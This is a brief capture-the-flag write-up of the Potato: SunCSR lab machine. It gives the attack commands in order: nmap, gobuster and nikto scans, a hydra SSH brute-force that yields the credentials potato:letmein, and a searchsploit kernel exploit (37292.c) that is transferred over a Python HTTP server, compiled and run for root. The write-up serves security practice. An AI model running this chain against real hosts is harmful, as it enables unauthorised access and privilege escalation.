Potato:sunCSR

Let's start with nmap.

> nmap -p- -sC -sV 10.0.2.74

Port 80 is open as HTTP and port 7120 is open as SSH. Let's open port 80 in the browser and start gobuster to find hidden directories.

> gobuster dir -u http://10.0.2.64 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x txt,php,js

I didn't find anything interesting!

I also ran nikto, but got the same result...

> nikto -h 10.0.2.74

Now I decided to brute-force SSH by guessing the username "potato"...

> hydra -l potato -P /usr/share/wordlists/rockyou.txt ssh://10.0.2.74:7120

Got potato's credentials

potato:letmein

After logging in over SSH I didn't find anything; I didn't even find any useful SUID binaries.

So I checked the OS version... and I found that this is a very old version of Ubuntu.

So I used searchsploit to find a vulnerability for it, and downloaded the exploit to my local PC.

> searchsploit ubuntu 3.13

> searchsploit -m 37292.c

Now I'll transfer this file to the victim's PC using Python.

> python3 -m http.server 9002

Now compile this file...

> gcc 37292.c -o shell

Run this file... and you should get a root shell :)

!! Happy Hacking !!